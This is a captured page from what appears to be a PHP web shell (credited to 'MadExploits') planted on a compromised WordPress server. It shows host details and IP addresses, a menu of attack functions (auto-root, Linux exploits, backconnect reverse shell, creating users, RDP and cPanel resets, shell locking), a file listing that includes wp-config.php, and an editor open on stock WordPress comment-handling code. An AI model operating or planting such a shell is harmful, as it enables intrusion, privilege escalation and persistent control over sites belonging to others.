Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.12.163.14
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
oxandrolone.com.ua /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-sr-x
wp-admin
[ DIR ]
drwxr-sr-x
wp-content
[ DIR ]
drwxr-sr-x
wp-includes
[ DIR ]
drwxr-sr-x
.htaccess
324
B
-rw-r--r--
400.shtml
515
B
-rw-r--r--
401.shtml
515
B
-rw-r--r--
403.shtml
515
B
-rw-r--r--
404.shtml
515
B
-rw-r--r--
500.shtml
515
B
-rw-r--r--
error.gif
6.82
KB
-rw-r--r--
index.php
418
B
-rw-r--r--
license.txt
19.46
KB
-rw-r--r--
readme.html
10.61
KB
-rw-r--r--
robots.txt
900
B
-rw-r--r--
sitemap.xml
2.39
KB
-rw-r--r--
wp-activate.php
4.92
KB
-rw-r--r--
wp-blog-header.php
271
B
-rw-r--r--
wp-comments-post.php
1.34
KB
-rw-r--r--
wp-config-sample.php
4.08
KB
-rw-r--r--
wp-config.php
4.78
KB
-rw-r--r--
wp-cron.php
3.21
KB
-rw-r--r--
wp-links-opml.php
2.32
KB
-rw-r--r--
wp-load.php
3.24
KB
-rw-r--r--
wp-login.php
32.92
KB
-rw-r--r--
wp-mail.php
7.7
KB
-rw-r--r--
wp-settings.php
12.72
KB
-rw-r--r--
wp-signup.php
27.92
KB
-rw-r--r--
wp-trackback.php
3.94
KB
-rw-r--r--
xmlrpc_old.php
2.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-comments-post.php
<?php /** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) { header('Allow: POST'); header('HTTP/1.1 405 Method Not Allowed'); header('Content-Type: text/plain'); exit; } /** Sets up the WordPress Environment. */ require( dirname(__FILE__) . '/wp-load.php' ); nocache_headers(); $comment = wp_handle_comment_submission( wp_unslash( $_POST ) ); if ( is_wp_error( $comment ) ) { $data = $comment->get_error_data(); if ( ! empty( $data ) ) { wp_die( $comment->get_error_message(), $data ); } else { exit; } } $user = wp_get_current_user(); /** * Perform other actions when comment cookies are set. * * @since 3.4.0 * * @param WP_Comment $comment Comment object. * @param WP_User $user User object. The user may not exist. */ do_action( 'set_comment_cookies', $comment, $user ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; /** * Filter the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;
Close